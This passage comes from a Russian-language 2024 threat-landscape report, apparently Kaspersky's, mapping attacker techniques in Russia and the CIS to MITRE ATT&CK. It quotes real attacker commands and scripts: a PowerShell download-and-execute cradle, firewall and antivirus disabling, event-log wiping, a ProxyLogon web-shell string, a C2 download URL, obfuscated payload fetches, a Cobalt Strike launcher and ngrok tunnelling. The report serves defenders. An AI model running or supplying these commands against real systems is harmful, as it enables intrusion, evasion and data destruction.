взаимодействуют с WMI, загружают необходимое ПО, изменяют параметры конфигурации, добавляют
или меняют значения реестра и т.д.

Большим преимуществом PowerShell для атакующих является простота обфускации команд.

Как атакующие используют PowerShell?

Основные сценарии использования PowerShell включают изменение параметров ПО (например,
Windows Defender), скачивание дополнительного ПО, выполнение C# кода:

$windir\\$system32\\WindowsPowerShell\\v1.0\\[Link] Add-MpPreference -ExclusionPath @

($env:UserProfile, $env:ProgramData) -ExclusionExtension

[Link] -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object

[Link]).DownloadString(

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 27

Permission Groups Discovery: Local Groups T1069.001

Зачем атакующие проводят разведку локальных групп?

Атакующие просматривают существующие локальные группы и их участников, чтобы использовать
эту информацию при планировании дальнейшего развития атаки. Имена пользователей в стандартных
группах могут использоваться для перебора паролей.

Как атакующие проводят разведку локальных групп?

Windows предоставляет множество возможностей просмотреть локальные группы и их участников.
Это можно сделать при помощи GUI, PowerShell, однако самый распространенный способ — разведка
при помощи утилиты [Link]. Наиболее частая команда, выполняемая атакующими:

[Link] localgroup Administrators

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 28

Event Triggered Execution: Image File Execution Options Injection T1546.012

Зачем атакующие используют IFEO?

Ветка реестра IFEO (Image File Execution Options) используется для закрепления.

Как атакующие используют IFEO?

В значение Debugger для какого-то приложения в ветке HKLM\SOFTWARE\Microsoft\Windows NT\
CurrentVersion\Image File Execution Options\<application>.exe добавляется исполняемый файл,
который выполнится, когда приложение <application>.exe будет запущено. Самые распространенные
приложения, к которым атакующие «добавляют дебаггер»:

• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]

Чаще всего атакующие в качестве значения устанавливают свой исполняемый файл или команду
с целью выведения из строя системы как, например, [Link] /c del.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 29

Service Stop T1489

Зачем атакующие останавливают работу служб?

Есть несколько целей, которые могут преследовать атакующие, останавливая работу легитимных
служб:

Нарушить работоспособность всей системы или какой-то ее части.

Остановить приложение или службу, мешающее выполнять задачи атакующих, например, шифрование
данных.

Для вступления в силу изменений, внесенных атакующими в конфигурацию службы.

Как атакующие останавливают работу служб?

Наиболее часто встречаются три способа остановки служб: с помощью утилиты [Link], с помощью
утилиты [Link], с помощью [Link]. Примеры командных строк, часто встречаемых нами:

• sc stop eventlog
• net stop <service_name>
• taskkill /PID <PID>
• TASKKILL /F /IM [Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 30

Masquerading: Match Legitimate Name or Location T1036.005

Зачем атакующие мимикрируют под легитимное ПО?

Называя файлы как легитимные системные исполняемые файлы или располагая их в системе похожим
на легитимное ПО образом, атакующие делают процесс обнаружения компрометации сложнее. В ОС
Windows множество стандартных исполняемых файлов и количество легитимного ПО увеличивается,
если брать в расчет пользовательские программы, такие как, например, браузеры. Многие из них
создают задачи планировщика, службы или добавляют те или иные исполняемые файлы в автозапуск,
отчего у атакующих появляется множество возможностей для мимикрии.

Как атакующие мимикрируют под легитимное ПО?

Наиболее частый сценарий маскировки — назвать исполняемый файл так же, как и легитимный
исполняемый файл Windows. Зачастую переименованный вредоносный файл располагается
в открытой, нетипичной для легитимного файла с таким же именем директории, например, AppData\
Local\Temp или в папке Downloads. Примеры часто встречающихся названий:

• C:\Users\<User>\AppData\Local\[Link]
• C:\Users\<User>\AppData\Local\[Link]
• C:\Windows \System32\[Link]
• C:\Users\<User>\AppData\Local\[Link]
• C:\Users\<User>\AppData\Local\[Link]
• C:\Users\<User>\AppData\Local\[Link]
• C:\Users\<User>\AppData\Local\[Link]
• C:\Users\<User>\AppData\Local\Microsoft\[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 31

Process Injection: Portable Executable Injection T1055.002

Зачем атакующие используют PE injection?

PE injection — один из самых простых способ инъекции кода в другой процесс и его выполнения
в контексте другого процесса. Атакующие пользуются этим способом из-за того, что он объединяет
в себе простоту реализации и эффективность. Часто Process Injection используется не только для
более скрытного выполнения своих действий, но и для повышения привилегий.

Как атакующие используют PE injection?

Атакующие записывают образ исполняемого файла в адресное пространство целевого процесса
и создают в нем удаленный поток (CreateRemoteThread), который его выполняет. Самые частые
процессы, в которые происходит инъекция:

• C:\Windows\System32\[Link]
• C:\Windows\[Link]
• C:\Windows\System32\[Link]
• C:\Windows\System32\[Link]
• C:\Windows\System32\[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 32

Impair Defenses: Disable or Modify System Firewall T1562.004

Зачем атакующие отключают или вносят изменения в хостовой FW

Windows?
Чтобы иметь возможность соединяться по сети с серверами C2 или чтобы иметь базовый доступ
к сети от нетипичного приложения.

Как атакующие отключают или вносят изменения в хостовой FW

Windows?
Наиболее распространены два способа изменения или отключения хостового файервола: с помощью
утилиты netsh или с помощью внесения изменений в параметры реестра Windows. Примеры
популярных командных строк:

• netsh firewall add allowedprogram

• netsh firewall set opmode mode=disable
• netsh advfirewall set currentprofile state off
• netsh advfirewall set allprofiles state off

Пример ветки реестра и значения, добавленного атакующими, разрешающих входящий UDP трафик
для приложения C:\Users\<user>\AppData\Local\Temp\[Link]:

HKLM\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules

Registry_value_name: {20E9A179-7502-465F-99C4-CC85D61E7B23}

Registry_value:'v2.10|Action=Allow|Active=TRUE|Dir=In|Protocol=17|Profile=Public|App=C:\
Users\<user>\AppData\Local\Temp\[Link]|Name=[Link]|'}

Еще один способ, которым пользуются атакующие для отключения Windows FW — остановка сервиса
mpssvc. Чаще всего они осуществляют ее с помощью утилиты net:

net stop mpssvc

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 33

Process Injection: Process Hollowing T1055.012

Зачем атакующие используют Process Hollowing?

Техника Process Hollowing используется атакующими для более скрытного выполнения кода и обхода
некоторых защитных мер. Сама техника заключается в запуске процесса, в котором основной
поток находится в приостановленном состоянии, и подмене исполняемого файла процесса своим
исполняемым файлом с последующим возобновлением работы потока. Это приводит к выполнению
кода в контексте другого процесса.

Как атакующие используют Process Hollowing?

Самый частый сценарий Process Hollowing — это создание процесса C:\Windows\System32\[Link]
и перезапись его исполняемого файла в адресном пространстве. Для большей скрытности атакующие
в некоторых случаях объединяют технику Process Hollowing с техникой Access Token Manipulation:
Parent PID Spoofing (T1134.004). Это позволяет им избежать аномалий в дереве процессов,
возникающих вследствие создания процесса [Link].

Еще один частый сценарий — hollowing процессов [Link] или [Link].

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 34

Process Injection: Dynamic-link Library Injection T1055.001

Зачем атакующие используют DLL injection?

Простая в реализации, но эффективная техника DLL injection позволяет атакующим лучше скрывать
свои действия в скомпрометированной системе за счет выполнения кода в контексте другого,
почти всегда легитимного процесса. В тех случаях, например, когда в токене атакующих есть
SeDebugPrivilege, DLL injection может использоваться как способ повышения привилегий.

Как атакующие используют DLL injection?

Чаще всего атакующие загружают на скомпрометированную машину DLL с кодом, который
необходимо выполнить в контексте другого процесса. Предварительно записав в адресное
пространство целевого процесса имя DLL, атакующие создают удаленный поток в этот процесс
(CreateRemoteThread), стартовой рутиной которого является функция LoadLibrary с именем DLL
атакующих в качестве параметра. Выполнение удаленного потока приводит к загрузке DLL в адресное
пространство целевого процесса и выполнению функции DllMain из этой библиотеки.

Чаще всего в качестве целевых процессов выступают:

• $windir\\[Link]
• $windir\\$system32\\[Link]
• [Link]
• [Link]
• [Link]
• [Link]
• [Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в Kaspersky Sandbox Содержание 35

Create or Modify System Process: Windows Service T1543.003

Зачем атакующие используют службы Windows?

Используя службы, атакующие достигают двух целей: закрепление и повышение привилегий.
При отсутствии мисконфигураций в системе повышение привилегий с помощью служб может быть
произведено от Администратора до пользователя NT Authority\System.

Как атакующие используют службы Windows?

Для создания служб атакующим (при отсутствии мисконфигураций в системе) необходимы права
локального Администратора. Создать службу можно с помощью PowerShell, sc или внеся изменения
в реестр.

Чаще всего атакующие добавляют свой исполняемых файл в качестве исполняемого файла службы.
Пути исполняемых файлов вредоносных служб часто включают в себя открытые директории:

• C:\Users\<user>\AppData\Local\oaocofwmfjha\[Link]
• C:\Users\<user>\AppData\Local\nalfdgwigwyg\[Link]
• C:\Users\<user>\AppData\Local\SystemFiles\[Link]

Имена и исполняемые файлы служб часто мимикрируют под легитимное ПО в системе. Пример
популярных имен служб атакующих:

• serivces
• serivecs
• wind0ws
• CCleanerPerformanceOptimizerService
• csrss
• Chistilka

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 36

Статистика на основе инцидентов

Статистика в этом разделе была собрана на основе инцидентов, произошедших на территории РФ
и СНГ и расследованных нашими коллегами из команды GERT.

График 5 Топ техник на основе расследованных инцидентов

Valid Accounts (T1078) 14,49%

Indicator Removal (T1070) 10,14%

Remote Services: Remote Desktop Protocol (T1021.001) 10,14%

Network Service Discovery (T1046) 8,69%

Masquerading (T1036) 8,69%

Scheduled Task/Job (T1053) 8,69%

System Services: Service Execution (T1569.002) 8,69%

Remote System Discovery (T1018) 7,24%

Remote Services: SMB/Windows Admin Shares (T1021.002) 5,79%

Impair Defenses (T1562) 4,34%

Unsecured Credentials (T1552) 4,34%

Create Account (T1136) 2,89%

Credentials from Password Stores (T1555) 2,89%

Remote Services: SSH (T1021.004) 2,89%

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 37

Разбор Unified Kill Chain

Проанализировав отчеты о расследовании инцидентов в компаниях из России и СНГ за последний год,
мы решили вывести среднестатистический Unified Kill Chain атакующих на организации. Подробнее
о концепции Unified Kill Chain мы рассказывали в нашем отчёте «Азиатские APT группировки»8.

In Through Out

1. Reconnaissance 9. Pivoting 15. Collection

2. Resource Development 10. Discovery 16. Exfiltration

3. Delivery 11. Privilege Escalation 17. Impact

4. Social Engineering 12. Execution 18. Objectives

5. Exploitation 13. Credential Access

6. Persistence 14. Lateral Movement

7. Defense Evasion

8. Command & Control

In
Фаза «In» в контексте Unified Kill Chain относится к начальным этапам кибератаки, направленным
на получение доступа к внутренней сети целевой организации. Эти этапы включают в себя ряд
тактических действий, начиная от внешней разведки и заканчивая взятием под контроль систем внутри
защищаемой сети.

Reconnaissance

Для разведки инфраструктуры жертв атакующие использовали арендованные VPS сервера, с которых
производили сканирование на наличие известных уязвимостей.

8 Азиатские APT группировки Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 38

Resource Development

В большинстве целевых атак на организации в исследуемом регионе преимущественно

использовались общедоступные утилиты:

• Cobalt Strike
• Metasploit
• Mimikatz
• Stowaway
• PowerSploit
• SoftPerfectNetworkScannerPortable
• Advanced IP Scanner
• [Link]
• AnyDesk
• Ngrok
• BloodHound
• Chisel
• PowerView
• CrackMapExec
• PsExec
• Impacket

Initial access & Delivery

В большинстве анализируемых нами атак на организации в регионе злоумышленники получают

первоначальный доступ к инфраструктуре жертв, используя действительные локальные или доменные
учетные записи, чаще всего учетные данные VPN или SSH. Получив доступ к инфраструктуре
жертвы, злоумышленники используют протокол удаленного рабочего стола (RDP) для перемещения
по инфраструктуре.

Также одним из распространенных методов компрометации является атака через подрядчиков.

Группа злоумышленников получает доступ к инфраструктуре жертв через подрядчиков, используя
сертификат пользователя для подключения к VPN клиента. Имея доступ к VPN, злоумышленник может
подключиться к системам через протокол удаленного рабочего стола (RDP), а затем переместиться
в инфраструктуру клиента.

Social Engineering

Этап «Social Engineering» (Социальная инженерия) в контексте Unified Kill Chain представляет собой
методику, используемую злоумышленниками для манипулирования людьми с целью получения
конфиденциальной информации или осуществления несанкционированного доступа к системам.
В исследуемом регионе чаще всего встречались:

• Целевые атаки на конкретных пользователей или организации с использованием

персонализированных сообщений, основанных на собранных данных о жертве.
• Методы психологического воздействия на сотрудников организаций, с целью получение учетных
записей для получения доступа к инфраструктуре.

Exploitation

Этап «Exploitation» (Эксплуатация) в контексте Unified Kill Chain описывает процесс, при котором
злоумышленники используют обнаруженные или известные уязвимости в системе или программном
обеспечении жертвы для внедрения вредоносного кода или выполнения вредоносных операций.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 39

Чаще всего за исследуемый период мы выявили эксплуатации следующих уязвимостей:

ProxyShell/ProxyLogon

Уязвимости ProxyShell и ProxyLogon были обнаружены в Microsoft Exchange Server и позволяли

атакующим удалённо выполнить код на сервере без аутентификации. Злоумышленники использовали
эти уязвимости для выполнения произвольного кода на уязвимых серверах, что позволяло
устанавливать веб-шеллы для дальнейшего контроля над системой, извлечения конфиденциальной
информации и развертывания дополнительного вредоносного ПО.

Пример обнаруженных попыток эксплуатации уязвимости ProxyLogon:

Set-OabVirtualDirectory, -ExternalUrl \"[Link] language=\"JScript\"

runat=\"server\">; function Page_Load(){/**/eval(Request[\"x4kme\"],\"unsafe\");}<;/script>;\" -Identity
\"OAB (Default Web Site)\

Remove-OabVirtualDirectory, -Force "True" -Identity "[REDACTED]\\OAB (Default Web Site)"

New-OabVirtualDirectory, -WebSiteName "Default Web Site" -Server "[REDACTED]" -Role

"ClientAccess" -InternalUrl "https:/[REDACTED].ru/OAB" -Path "C:\\Program Files\\Microsoft\\Exchange
Server\\V15\\FrontEnd\\HttpProxy\\OAB"

Vmware

Уязвимости в VMware vCenter часто связаны с возможностью удаленного выполнения кода, что
позволяет атакующим манипулировать управлением виртуальной инфраструктурой.

Пример:

В одном из инцидентов произошедшем в России мы обнаружили бэкдор FaceFish, который

был загружен с помощью веб-шелла на сервере VMware vCenter, установленного в результате
эксплуатации уязвимости CVE-2021-21972 и CVE-2021-22005.

/usr/lib/vmware-vsphere-ui/server/static/resources/libs/[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 40

Веб-шелл [Link], который был установлен на сервер был взят из репозитория на GitHub.

Подробнее

Бэкдор FaceFish был загружен с удаленного сервера С2:

hxxp://146.190.23[.]86/ssh1200

FaceFish атакует Linux системы и позволяет перехватывать пароли пользователей, подключающихся

к системе по протоколу SSH, и исполнять произвольный код, получаемый с сервера управления.

После запуска бэкдор сохраняет на систему библиотеку (shared library) [Link] и внедряет ее в процесс
sshd с помощью метода [Link] и перезапускает сервис ssh.

Рисунок 1 Процесс запуска бэкдора

Веб-шеллы представляют собой вредоносные скрипты, размещенные на веб-серверах и позволяющие

атакующим удаленно управлять сервером.

Пример веб-шелла который позволяет выполнять произвольный код на сервере и загружать на него
файлы:

Рисунок 2 Веб-шелл

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 41

Список системных путей, в которые чаще всего загружают веб-шеллы атакующие:

/var/www/html/
/public_html/
/var/www/html/wp-content/uploads/
/var/www/html/wp-content/plugins/
/var/www/html/wp-includes/
/var/tmp/
/tmp/
/dev/shm/
/home/bitrix/ext_www/
/var/www/html/assets/js/
/var/www/html/assets/css/
/var/www/html/assets/img/

Большинство веб-шеллов атакующих представляют из себя общедоступные утилиты, доступные

на GitHub:

• [Link]
• [Link]

Persistence

Чаще всего для закрепления атакующие создают локальные и доменные учетные записи и группы,
используя системные утилиты или же общедоступные инструменты, такие как PowerSploit.
Злоумышленники настраивают задачи в планировщике Windows, чтобы запускать вредоносное ПО
в определенное время или при определенных событиях, что помогает поддерживать активность
вредоносного ПО даже после перезагрузки системы, а также изменяют или добавляют ключи реестра,
отвечающие за автоматический запуск ПО при старте системы или логоне пользователя.

Пример использования системной утилиты [Link] для добавления пользователя в группу доменных
администраторов:

net group "Администраторы Домена" [REDACTED] /add /domain

Один из примеров создания локальной учетной записи «veeam», замаскированной под сервисную
учетную запись для работы с программным обеспечением Veeam:

net user /add veeam [redacted]

net localgroup administrators veeam /add

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 42

Пример использования модуля PowerView:

Add-DomainGroupMember -Identity [REDACTED] -Members 'EXCHANGE WINDOWS PERMISSIONS'

Add-DomainGroupMember -Identity [REDACTED] -Members 'Organization Management'

Add-DomainObjectAcl -Rights 'All' -TargetIdentity "users" -PrincipalIdentity "engineers"

Пример использования задач планировщика:

schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "[REDACTED]" /tr "$user\$appdata\[malware]\.
exe"

Самые популярные ветки реестра, использующиеся атакующими для закрепления:

• HKCU\$usersid\Software\Microsoft\Windows\CurrentVersion\Run\
• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
• HKCU\$usersid\Software\Microsoft\Windows\CurrentVersion\RunOnce\
• HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs
• HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\

Defense Evasion

Часто атакующие в скомпрометированной инфраструктуре пытаются создать оптимальные для

достижения своих целей условия: отключают защитные решения, удаляют, останавливают или
изменяют конфигурацию сервисов, которые блокируют выполнение задуманных ими действий.
Например, для остановки антивирусной защиты Sophos злоумышленники используют PowerShell
скрипт Sophos_kill_local.ps1:

Sophos_kill_local.ps1

Данный скрипт пытается завершить процессы Sophos на компьютере и записывает результаты в

локальные и удаленные файлы журналов.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 43

$LogTime = Get-Date -Format "MM-dd-yyyy_hh-mm-ss"

$path = "C:\Program Files (x86)\Sophos\Logs\"
$pcname = $env:computername
$Processes = Get-WmiObject -Class Win32_Process -ComputerName $env:computername -Filter
"ExecutablePath LIKE '%Sophos%'"
foreach ($process in $processes) {
$ProcessName = $[Link]
$returnval = $[Link]()
$processid = $[Link]
if($[Link] -eq 0) {
$LogFile1 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Success-Terminated"+".txt"
$LogFile11 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Success-
Terminated"+".txt"
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile1
-Append -Force
"The process $ProcessName ($processid) has been terminated successfully." | Out-File $LogFile11
-Append -Force
} else {
$LogFile2 = 'C:\Program Files (x86)\Sophos\Logs\'+$LogTime+"_Sophos Not-Terminated"+".txt"
$LogFile22 = '\\[redacted]\NETLOGON\Sophos\Logs\'+$pcname+"_"+$LogTime+"_Sophos Not-
Terminated"+".txt"
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile2 -Append
-Force
"The process $ProcessName ($processid) has not been terminated." | Out-File $LogFile22 -Append
-Force
}
}

Также в ходе атаки злоумышленники пытаются замести следы и затруднить работы по реагированию
на инцидент. С этой целью они удаляют следы присутствия в виде исполняемых файлов, которые они
запускали, скриптов, а также очищают журналы событий. Для очистки логов атакующие используют
системную утилиту [Link].

Примеры использования:

powershell -command wevtutil el | Foreach-Object {Write-Host Clearing $_; wevtutil cl $_}

C:\Windows\system32\[Link]" /c for /F "tokens=*" %1 in ('[Link] el') DO [Link] cl "%1

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 44

Для удаления артефактов, указывающих на использование RDP, злоумышленники чаще всего

пользуются скриптами для очистки истории подключений.

Пример скрипта, который использует группировка Twelve:

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib -s -h %userprofile%\documents\[Link]
del %userprofile%\documents\[Link]
del /f /s /q /a %AppData%\Microsoft\Windows\Recent\AutomaticDestinations
reg delete "HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Explorer/RunMRU" /
va /f

В большинстве случаев скрипты, которыми пользуются атакующие, обфусцированы. Это делается для
затруднения анализа и повышения вероятности обхода «сигнатурного» обнаружения вредоносных
скриптов. Примеры обфускации команд:

"$windir\$system32\[Link]" /c vvS || EcHO vvS & P"i"ng vvS || Cu"rl" [Link] -o

$user\$temp\[Link] & P"i"ng -n 4 vvS || c"S"C"r"I"P"T $user\$temp\[Link] & exit

P"i"ng -n 4 vvS

"$windir\$system32\[Link]" /v/q /r^S^t^AR^t ^m^S^iexEC V^u^t^g=I^c^AY^E&#x09;/^quIe^T

-PA^cK^A^GE "hTtp://[REDACTED]:8080/AYAxqx7hRA/aSIMymy3KoD4cwk/4Z/!comPuTErnAme!"
Pu^Fn^R=^G^a^L^x^dGb^Zu

Также злоумышленники для избежания обнаружения маскируют свои вредоносные файлы, сервисы,
задачи планировщика под легитимные продукты или сервисы.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 45

Примеры задач планировщика:

C:\Windows\System32\Tasks\run
C:\Windows\System32\Tasks\Update Microsoft
C:\Windows\System32\Tasks\Yandex
C:\Windows\System32\Tasks\YandexUpdate

Атакующие часто используют маскировку вредоносного программного обеспечения: дают файлам

имена, которые могут показаться легитимными или не вызывать подозрений у пользователя.
Например, имена, которые похожи на системные файлы Windows, чтобы пользователь считал их частью
операционной системы: [Link], [Link], [Link].

Маскировка под популярные приложения помогает скрыть вредоносные программы среди

легитимного программного обеспечения. В атаках вредоносное ПО часто маскируется под [Link],
[Link] или [Link] и [Link].

Использование расширений файлов, ассоциируемых с документами или медиафайлами, также

распространено, особенно если злоумышленники используют двойное расширение файлов.
В системе Windows по умолчанию скрыто истинное расширение файла, делая маскировку еще более
эффективной. Со своей стороны рекомендуем аналитикам SOC в любом случае обращать внимание
на наличие двойного расширения в телеметрии, т.к. это само по себе является подозрительным.

Файл, маскирующийся под PDF-документ, но являющийся

[Link] исполняемым файлом

[Link] Маскировка под изображение

[Link] Маскировка под видеофайл

Command & Control

В качестве Command & Control фреймворка атакующими чаще всего используется Cobalt Strike. Это
гибкий RedTeam инструмент, позволяющий подстраивать конфигурацию под нужды пользователя
и обладающий богатым функционалом, который можно использовать на различных этапах атаки.

Пример использования Cobalt Strike:

На Windows системе атакующие запустили обфусцированный [Link] скрипт, который запускает

обфусцированный Powershell скрипт IntellPrc.ps1.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 46

Ниже приведено содержимое скрипта [Link]

waIFf=Replace("[Link]","eoeou","")

set dDSRf=[Link](waIFf)

PgG54="%SystemRoot%\System32\WindowsPowerShell\v1.0\[Link] -ex bypass -NoLogo

-NonInteractive -NoProfile -WindowStyle Hidden -File ""C:\ProgramData\PrivateUSO\IntellPrc.ps1"""

gcZIkk=[Link](PgG54,0,0)

IntellPrc.ps1 содержит в себе два шелл-кода под архитектуры x86 и x64, в зависимости от архитектуры,
на которой выполняется скрипт, в память загружается шелл-код, который скачивает с удаленного С2
сервера основную полезную нагрузку (CobaltStrike beacon) и выполняет в памяти Powershell.

Также часто атакующие используют утилиту netcat, которая позволяет устанавливать соединения TCP
и UDP, принимать и передавать в них данные. Исходный код утилиты доступен на GitHub.

Подробнее

Популярными процедурами техники ingress tool transfer является использование системных утилит
wget и curl для доставки атакующими инструментов на хост:

wget [Link]
curl [Link]

Также эти утилиты могут использоваться в обфусцированном варианте:

cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://[REDACTED][Link]/get/JWNONUaUMt/Egrome.e^xe -o C:\

Users\Public\[Link];C:\Users\Public\[Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 47

Through
Фаза «Through» в контексте Unified Cyber Kill Chain относится к действиям злоумышленника в уже
скомпрометированной сети, направленным на расширение доступов к системам и данным, которые
необходимы для достижения конечных целей атаки. Этот этап включает в себя ряд действий,
направленных на углубление проникновения в инфраструктуру и доступа к критически важным
ресурсам.

Pivoting

Чаще всего злоумышленники используют утилиту ngrok для туннелирования. В большинстве случаев,
сразу после подключения к системе злоумышленники устанавливают её и прописывают в файле
конфигурации порт 3389 (стандартный порт RDP).

Артефактом, указывающим на то, что соединения злоумышленников были инициированы через ngrok,
является значение «::::%16777216» в поле «Source Network Address».

Пример использования:

"C:\Windows\System32\Microsoft\[Link]" tcp 3389

В данном случае атакующие используют переименованную утилиту ngrok, которую устанавливают в

качестве службы, используя конфигурационный файл.

C:\ProgramData\svchost\[Link] service run --config

C:\ProgramData\svchost\[Link]

Альтернативой использования ngrok выступают общедоступные утилиты Chisel и Stowaway.

Discovery

Для сканирования внутренней сети атакующие используют общеизвестные утилиты такие как:

• SoftPerfectNetworkScan
• PortQry
• Advanced IP Scanner
• fscan

[Link] -h [redacted] -m smb

[Link] -h [redacted] -m smb2
[Link] -h [redacted] -m ms17010

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 48

Получив доступ ко внутренней инфраструктуре жертвы, атакующие вновь сканируют хосты на наличие
открытых портов (3389, 445) и на наличие уязвимости EternalBlue с помощью инструмента [Link]

Для разведки домена атакующие в подавляющем большинстве случаев используют утилиты

BloodHound и PowerView:

Get-DomainObject users
Get-ADUser users
Get-ADUser -Filter * -SearchBase "[REDACTED OU]" | findstr Name
Get-ADGroup "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "EXCHANGE WINDOWS PERMISSIONS"
Get-ADGroupMember "engineers"
Get-DomainUser | Export-PowerViewCSV -Path "[redacted]"
Get-DomainComputer | Export-PowerViewCSV -Path "[redacted]"

Privilege Escalation

Во множестве проанализированных нами инцидентов атакующие уже имели привилегированные

учетные данные, а в случаях, когда им необходимо было повысить привилегии, было замечено
использование различных известных инструментов для автоматической эскалации привилегий или
поиска путей повышения привилегий, например WinPEAS.

Execution

Выполнение действий злоумышленниками на системе происходит почти всегда с помощью командных

интерпретаторов [Link] и powershell, но так же достаточно часто можно увидеть использование
атакующими задач планировщика.

Как мы уже описывали ранее, атакующие используют различные модули PowerShell для разведки
в домене, связи с серверами C2, загрузки дополнительных инструментов на скомпрометированные
хосты и для достижения других целей. Поскольку PowerShell предоставляет атакующим возможность
использовать различные инструменты операционной системы, и при этом относительно прост
в эксплуатации, он пользуется популярностью у атакующих.

Загрузка некоторых модулей может производиться в т.н. Fileless формате, как, например, в примере
с использованием wget:

wget [Link]

Для загрузки модуля атакующим остается лишь передать результат выполнения команды выше
в командлет Invoke-Expression или iex, после выполнения которых они получат доступ к командлетам,
реализованным в этом модуле.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 49

Часто можно увидеть использование атакующими [Link] как «прослойки» между получением
доступа и выполнением полезной нагрузки. Из-за удобства, быстроты и эффективности атакующие
нередко предпочитают реализовывать логику какого-либо этапа атаки с помощью bat-скриптов. Таким
образом мы видим запуск многих утилит из [Link], как, например, в bat-скрипте, использовавшимся
группировкой Twelve для изменения параметров реестра, который мы описывали выше.

Примеры исполнения вредоносных файлов через запланированные задачи группировкой TWELVE:

Имя задачи Команда

Dead1 reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Schedule\TaskCache\Tasks\{9042DCD8-1F89-4FC4-8B13-
4D3D5F3AED03}:Actions","`[Link]` /c c:\programdata\[Link] -pass [PASSWORD]

Dead2 reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Schedule\TaskCache\Tasks\{AB35C377-2AD2-4609-BB92-
824482E67525}:Actions","`[Link]` /c \\[DOMAIN]\netlogon\[Link]"

12lock "reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

Schedule\TaskCache\Tasks\{A131C020-DD72-428E-BD2A-7DEABAF428D0}:Actio
ns","`[Link]` Copy-Item `\\[DOMAIN]\netlogon\[Link]` -Destination `C:\
ProgramData

12lock 1 reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\

CurrentVersion\Schedule\TaskCache\Tasks\{0B177D41-E344-40D4-BDDA-
9C6A082CE273}:Actions","`[Link]` /c \\[DOMAIN]\netlogon\[Link] -pass
[PASSWORD]

Copywiper reg:\\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\

Schedule\TaskCache\Tasks\{FB72DE3D-DDA1-4A91-8634-B0523C26BCBF}:Actions"
,"`[Link]` Copy-Item `\\[DOMAIN]\netlogon\[Link]` -Destination `C:\
ProgramData`

run powershell -ex bypass -f \\[DOMAIN]\netlogon\outlookconf2003.ps1

YandexUpdate \\[DOMAIN]\netlogon\[Link] -pass [PASSWORD]

Update Microsoft C:\ProgramData\[Link]

Credential Access

